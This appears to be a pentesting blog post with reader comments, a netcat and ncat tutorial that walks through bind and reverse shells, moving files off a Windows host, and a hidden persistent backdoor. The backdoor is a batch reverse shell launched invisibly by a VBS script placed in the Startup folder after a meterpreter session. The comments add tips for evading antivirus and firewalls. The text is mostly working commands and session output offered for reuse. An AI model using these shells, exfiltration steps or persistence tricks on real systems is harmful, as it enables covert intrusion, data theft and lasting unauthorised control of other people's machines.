Netcat 1.10 =========== /\_/\ / 0 0 \ Netcat is a simple Unix utility which reads and writes data ====v==== across network connections, using TCP or UDP protocol. \ W / It is designed to be a reliable "back-end" tool that can | | _ be used directly or easily driven by other programs and / ___ \ / scripts. At the same time, it is a feature-rich network / / \ \ | debugging and exploration tool, since it can create almost (((-----)))-' any kind of connection you would need and has several / interesting built-in capabilities. Netcat, or "nc" as the ( ___ actual program is named, should have been supplied long ago \__.=|___E as another one of those cryptic but standard Unix tools. Windows C:\Documents and Settings\host\Desktop>nc -lvvp 4444 -e cmd.exe Linux root@bt:~# nc -v 192.168.1.2 4444 10.255.245.136: inverse host lookup failed: Unknown server error : Connection timed out (UNKNOWN) [192.168.1.2] 4444 (?) open Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\host\Desktop> ------------------------------------------------------------ Windows C:\Documents and Settings\host\Desktop>nc -lvvp 4444 listening on [any] 4444 ... Linux root@bt:~# nc -v 192.168.1.4 4444 -e /bin/bash 10.255.245.136: inverse host lookup failed: Unknown server error : Connection timed out (UNKNOWN) [192.168.1.4] 4444 (?) open Back on windows type ifconfig C:\Documents and Settings\host\Desktop>nc -lvvp 4444 listening on [any] 4444 ... 192.168.1.4: inverse host lookup failed: h_errno 11004: NO_DATA connect to [10.255.245.136] from (UNKNOWN) [192.168.1.4] 59987: NO_DATA ifconfig eth0 Link encap:Ethernet HWaddr 00:01:02:03:04:05 inet addr:192.168.1.4 Bcast:10.255.245.255 Mask:255.255.255.0 ------------------------------------------------------------ to make a windows machine connect back to backtrack machine. open terminal and type in nc -lvvp 80 root@bt:~# nc -lvvp 80 listening on [any] 80 ... then on the windows machine typing the following will make it dial back to your machine. ncat -v your-ip-address 80 -e cmd.exe C:\Program Files\Nmap>ncat -v your-ip-address 80 -e cmd.exe Ncat: Version 6.00 ( http://nmap.org/ncat ) Ncat: Connected to your-ip-address:80. The Windows machine should now have connected to you you should be able to see this in the open window on your backtrack machine. ============================================== Once connected you may want to send files back from the windows machine to backtrack open a new Window in backtrack type in ncat -v -lp 2223 > test-doc.txt root@bt:~# ncat -v -lp 2223 > test-doc.txt Ncat: Version 5.61TEST4 ( http://nmap.org/ncat ) Ncat: Listening on :::2223 Ncat: Listening on 0.0.0.0:2223 In the window that has the connection to the Windows machine move to the directory that has the file you want and type in ncat --send-only your-ip-address 2223 < test-doc.txt C:\Program Files\Cisco Systems\VPN Client\Profiles>ncat --send-only your-ip-address 2223 < test-doc.txt ncat --send-only your-ip-address 2223 < test-doc.txt then go to your root folder in backtrack and look for the file you moved across here it was called test-doc.txt you can move any file not just .txt! ============================================== Linux - Linux root@bt:~# nc -lvvp 4444 root@bt:~# nc -v 192.168.1.4 4444 -e /bin/bash
==============================================
Continued AV Bypass testing.
Testing with Win 7
Were not ready to release the initial exploit that helped get us to a meterpreter session.
If honest because it does not trigger under any AV.
Once exploited uploading the following listed does not trigger AV
All files can be found by installing nmap on a windows machine. Open the installed folder and copy out what you require.
meterpreter > upload /root/nmap/ C:\
[*] uploading : /root/nmap//ncat.exe -> C:\\ncat.exe
[*] uploaded : /root/nmap//ncat.exe -> C:\\ncat.exe
[*] uploading : /root/nmap//libeay32.dll -> C:\\libeay32.dll
[*] uploaded : /root/nmap//libeay32.dll -> C:\\libeay32.dll
[*] uploading : /root/nmap//VBS.vbs -> C:\\VBS.vbs
[*] uploaded : /root/nmap//VBS.vbs -> C:\\VBS.vbs
[*] uploading : /root/nmap//Notes -> C:\\Notes
[*] uploaded : /root/nmap//Notes -> C:\\Notes
[*] uploading : /root/nmap//nc.bat -> C:\\nc.bat
[*] uploaded : /root/nmap//nc.bat -> C:\\nc.bat
[*] uploading : /root/nmap//ssleay32.dll -> C:\\ssleay32.dll
[*] uploaded : /root/nmap//ssleay32.dll -> C:\\ssleay32.dll
[*] uploading : /root/nmap//nmap.exe -> C:\\nmap.exe
[*] uploaded : /root/nmap//nmap.exe -> C:\\nmap.exe
————————————————————
nc.bat script,
C:\ncat.exe -v 10.255.245.135 443 -e cmd.exe
VBS.vbs script used to run the nc.bat script invisibly,
Set WshShell = CreateObject(“WScript.Shell” )
WshShell.Run chr(34) & “C:\nc.bat” & Chr(34), 0
Set WshShell = Nothing
————————————————————
Gaining shell so we can move VBS.vbs to the start up folder. Making the script trigger each time user logs in.
meterpreter > execute -f cmd.exe -c
Process 3176 created.
Channel 8 created.
meterpreter > shell
Process 3864 created.
Channel 11 created.
Microsoft Windows [Version 6]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\test\Documents>move C:\VBS.vbs “C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”
1 file(s) moved.
————————————————–
Rebooting the Win 7 box to test if the start up script works.
C:\Users\test\Documents>shutdown -r -t 0
————————————————–
Back on backtrack open a new terminal and set up nc listener.
Once the person reboots back into the account the VBS.vbs will run
root@bt:~# nc -lvvp 443
listening on [any] 443 …
Remote-IP: inverse host lookup failed: Unknown server error : Connection timed out
connect to [10.255.245.135] from (UNKNOWN) [Remote-IP] 49156
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Updates
hi ! What abut win 7 and firewall is on ? Working or not
Hi andrej, Thanks for the question I appropriate that you read the blog. Quick reply yes it should work. If on the windows machine you typed
ncat -v your-machines-ip-address 80 -e cmd.exe
The windows machine will connect out on port 80 http so will look just like normal internet traffic. Firewalls normally do not block http. Exception on this is larger estates that use a proxy and there internal Firewall only allows access for the proxy out to the internet.
try tunneling all your traffic over port 80 on different note you could change the FW or turn it off once you have access via ncat any way.
Give it a try with regards to OS netcat dosn’t care if windows xp, vista, 7 or Linux.
Its a very good tool.
Thank you for your reply:
It’s working :
My Test:
1.NetCat – test – Windows Vista Home Basic SP1 FireWall is On
c:\tools>nc -l -v -p80 -e cmd.exe
listening on [any] 80 …
192.168.235.10: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [192.168.235.1] from (UNKNOWN) [192.168.235.10] 34431: NO_DATA
2.VMware – BackTrack 5R2
root@bt:~# nc -v 192.168.235.1 80 –
192.168.235.1: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.235.1] 80 (www) open
Microsoft Windows [Wersja 6.0.6002]
Copyright (c) 2006 Microsoft Corporation. Wszelkie prawa zastrze?one.
c:\tools>dir
dir
Wolumin w stacji C to OS
Numer seryjny woluminu: 6892-B5E7
Katalog: c:\tools
———————————————————————————————
But – The Windows firewall detects and, by default, blocks programs from opening
TCP/IP sockets and listening for incoming connections.
How do I add exceptions to the firewall ???
I can’t find good “exploit” for windows vista 🙂 It is a fortress ??? 🙂
Great to see you testing. For adding exceptions to Windows firewall please look at
http://www.myexploit.wordpress.com/control-windows-firewall-from-the-command-line/
A quick example below should allow port 80 in on Win 7 so should work on vista?
netsh advfirewall firewall add rule name=”Open Port 80″ dir=in action=allow
You could change the port number to any you require.
With regards to exploiting Vista/Win7 we have fully agreement it’s been improved and now hard to exploit. Best way is to look at exploiting the apps on it. Browsers are still very exploitable. Try this example in your lab.
http://www.myexploit.wordpress.com/control-metasploit-browser_autopwn/
Hi !
Thank you for your help.
I create my Backdoor on a Windows XP with NetCat.
http://msfbt.wordpress.com/2012/06/06/creating-a-netcat-backdoor-on-a-windows-xp/
But I still working with exploit ( metasploit ) + win vista ( or win 7 ).
Regards
Andrej
Hi Andrej no problem happy you looked at the blog.
Forget metasploit-ms08_067_netapi exploit the buffer overflow was fixed with an update for XP and by default in vista onwards. So no joy with Win 7.
Conficker uses the ms08_067_netapi exploit so as you can imagine a larger percentage of estates have now defended against it. As they should! Also its rare to find port 445 open on the outside.
With regards to Win7 exploit have a go at
http://www.myexploit.wordpress.com/control-respect-to-armitage1989/
This will slip past AV and works against Win7